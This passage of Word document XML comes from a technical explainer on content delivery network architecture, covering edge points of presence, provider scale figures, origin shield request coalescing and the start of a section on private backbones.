      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">             │                     │                     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A45133" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    ┌────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────┐</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>┌───────</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CBC8F9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    │        │        │   │        │        │   │       │       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE9E22E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Edge     Edge     Edge Edge   Edge    Edge   Edge   Edge   Edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6396E3DD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  (Tokyo) (Osaka) (Seoul)(London)(Paris)(Frankfurt)(São Paulo)(Rio)(Lima)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB07784" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">    │        │        │   │        │        │   │       │       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E5E1D0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Users   Users   Users Users   Users    Users Users  Users  Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0814C0C2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.2 Edge PoP (Point of Presence) — The First Cache Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F337DF0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What it is physically:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15732127" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>A cluster of servers deployed at an Internet Exchange Point (IXP) or within an ISP's data center, typically 5–100+ servers per location:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB9B26" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache servers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Store and serve content (NVMe SSDs for warm storage, RAM for hot content).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0BF3AC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS termination:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Handle encryption/decryption for millions of concurrent connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278FD27F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Load balancers:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Distribute traffic across cache servers within the PoP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B10C7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS resolvers (sometimes):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Answer DNS queries for CDN domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190F7671" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1235"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Compute nodes (sometimes):</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Execute edge functions (Workers, Lambda@Edge).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F7FDB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scale of major CDNs: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357"/>
        <w:gridCol w:w="1529"/>
        <w:gridCol w:w="1469"/>
        <w:gridCol w:w="2340"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="150E6EF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18ADE0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CDN Provider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D368DB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>PoP Count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6A6FF4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Countries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55A7AC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network Capacity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4517E3A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C4C357" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Cloudflare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86BBDE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>300+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E216A0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>100+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8AF64E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>209+ Tbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="269D444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865FC8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Akamai</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153FC3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>4,100+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3C2051" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>134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B07C4B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>300+ Tbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="2451E27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513B85" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>AWS CloudFront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655475" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>450+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65B8C9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>90+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6EDE45" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>150+ Tbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="0C6FD33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690009" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Fastly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334430" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>80+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CBED6E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>30+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6088E0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>65+ Tbps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="0660E2E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06B6A7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Google Cloud CDN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99FE0F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>180+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B453AD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>40+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FADF99" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4DEE58C4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-PoP capacity (typical large PoP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD039A9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E40D5CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Servers: 20–50</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6856BEEF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Storage: 100–500 TB SSD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E7D022" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>RAM: 5–20 TB total</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7228851C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Network: 10–100 Gbps uplink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17877E6F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Connections: millions concurrent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440A1428" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Requests: 100,000–1,000,000+ RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B42656" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Origin Shield — The Collapse Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F88FD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The problem it solves:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A6F9EC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Without shield:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CEAC6D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>300 edge PoPs each maintain independent caches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B99555" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>When content expires at each edge, each independently requests from origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA2BF83" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Popular content with 60-second TTL: every 60 seconds, up to 300 requests hit origin simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6099D210" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1236"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Viral content that's never been cached: 300 simultaneous cold misses to origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081CA8FA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How shield works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B2748" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>All edges in a region route misses through a single "shield" node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6ED24B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7586589E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge (Tokyo) MISS → Shield (Singapore) HIT → Return to Tokyo (cached at edge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E028947" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge (Osaka) MISS → Shield (Singapore) HIT → Return to Osaka (cached at edge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02594795" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Edge (Seoul) MISS → Shield (Singapore) HIT → Return to Seoul (cached at edge)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361BC9FD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="6320C4DA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin sees: 0 requests (shield already had the content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2CDD25" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Without shield: Origin would see 3 concurrent requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032CE19C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shield also performs request coalescing (collapsing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD7D93D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B5E283" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>100 concurrent edge misses for the same URL arrive at shield within 50ms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BF94FB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Shield sends ONE request to origin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC32F69" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When origin responds, shield serves all 100 waiting requests from the single response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE9AE6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin load: 1 request instead of 100.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02893589" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shield placement strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D78349" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Place shield close to origin (minimize shield-to-origin latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD48268" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Or place shield at a well-connected hub (minimize edge-to-shield latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B9611" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1237"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Some CDNs allow multiple shields (one per region): Asia shield, Europe shield, Americas shield.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD8CC30" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.4 The CDN Backbone — Private Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E2840" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why CDN providers build private networks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FAFEC8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The public Internet is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0D2F32" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Unpredictable (routing changes, congestion, peering disputes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D88AC6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Suboptimal (BGP doesn't route for lowest latency, it routes for policy/economics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0950A048" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1238"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Congested (shared with all other traffic).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75218F2B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN private backbones:</w:t>
      </w:r>
